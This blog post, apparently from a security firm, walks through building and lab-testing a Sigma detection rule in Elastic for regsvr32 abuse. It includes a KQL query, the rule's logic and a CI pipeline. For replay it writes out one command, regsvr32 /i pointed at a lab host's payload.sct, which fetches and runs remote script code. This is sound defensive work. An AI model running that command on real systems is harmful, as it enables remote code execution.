Threat Hunting with Sigma and Elastic: From Indicator to Detection Rule
How to turn attack hypotheses into Sigma rules tested in Elastic, with a reproducible lab validation pipeline.
Threat hunting is not staring at pretty dashboards waiting for something to blink red. It starts with an ugly, hand-written hypothesis: 'an attacker used rundll32 to load a DLL from outside C:\Windows'. At Basilisk OffSec we treat every hunt as a small scientific experiment: hypothesis, collected data, query, falsification. The final result, when worth it, becomes a Sigma rule versioned in Git. This post walks through the full cycle we run against a Windows 11 lab with Sysmon 15 and Elastic 8.13, from a raw indicator to a detection with a measured false positive rate.
Before writing any rule we need to see real telemetry. We built a lab with three VMs: Windows 11 with Sysmon (modified SwiftOnSecurity config), a minimal Domain Controller following our Active Directory Pentest: Step-by-Step Kerberoasting in a GOAD Lab, and a single-node Elastic with Fleet. To generate controlled malicious behavior we use Caldera with ATT&CK TTPs, as detailed in Adversary Emulation with Caldera and MITRE ATT&CK in a Corporate Lab. Each run produces around 4,000 events per minute, enough to discover that your 'precise rule' actually has absurd noise the moment a user opens Teams.
The hypothesis for this example came from a public report: APT29 used regsvr32 with /s /u /i and an HTTP URL to download a payload. Before turning it into Sigma we validated it in Elastic Discover with KQL: process.name:regsvr32.exe and process.command_line:(*\/i\:http* or *\/i\:\\\\*). We found 12 hits in 7 days, all legitimate (corporate installers). This is the moment that separates a hunter from a useless-alert generator: enrich with process.parent.name and file.signature.signed. Related signed-binary abuse techniques appear in our Hunting Living-off-the-Land Binaries on Windows with KQL, required reading before going further.
With the query refined, we translate to Sigma YAML. The rule ended up with title, status experimental, logsource category process_creation and product windows, detection with selection_img (Image endswith \regsvr32.exe), selection_cli (CommandLine contains all: ['/i:', '://']) and filter_signed (Signed: true) under condition selection_img and selection_cli and not filter_signed. We convert with sigma convert -t lucene -p ecs_windows rule.yml and get the Elastic query ready. This pipeline flow is the same we use in the cycle described in Purple Team in Practice: Building a Red vs Blue Feedback Loop, where Red delivers TTPs and Blue returns coverage.
Testing a Sigma rule without replay is blind faith. We generate real events running regsvr32 /s /u /i:http://10.10.0.5/payload.sct scrobj.dll inside the lab, capture with Winlogbeat and measure: time to alert in Elastic Security was 14 seconds, with zero false positive in 72 hours of baseline. When we moved to simulated production (200 endpoints) 1 FP per day showed up from a McAfee update using /i: with a local path. We tuned the filter to exclude CommandLine containing C:\Program Files. This kind of iteration also appears in lateral movement, covered in Lateral Movement in the Lab: SMB, WMI and WinRM with a Detection Focus.
Documentation kills orphan rules. Every Sigma in our repo has custom fields: hypothesis, datasource_required, attack_id (T1218.010), false_positive_rate_observed, last_tested, and a link to the pcap/EVTX used in the test. We version it in GitLab with a pipeline that runs sigma check, then sigma convert for Elastic, Splunk and Chronicle, and publishes via the Kibana API using detection_engine/rules/_import. If conversion fails, the pipeline breaks. This discipline is what separates a SOC that evolves from one that collects PDFs. For complementary fast-DFIR visibility after a hit, we recommend the approach in DFIR on Linux: Live Triage with UAC and Velociraptor adapted to Windows with KAPE.
The practical takeaway: do not write Sigma for indicators you have never seen in your data. Always start by running the TTP in your lab, count the events generated, count the look-alike legitimate events, and only then write the rule. Internal Basilisk goal: no rule reaches production without 7 days of baseline and a measured FP rate below 1 per 10,000 events from the source. Start tomorrow with one small hypothesis, one query, and one YAML. In three months you will have 30 detections that actually work, instead of 300 that only generate fatigue.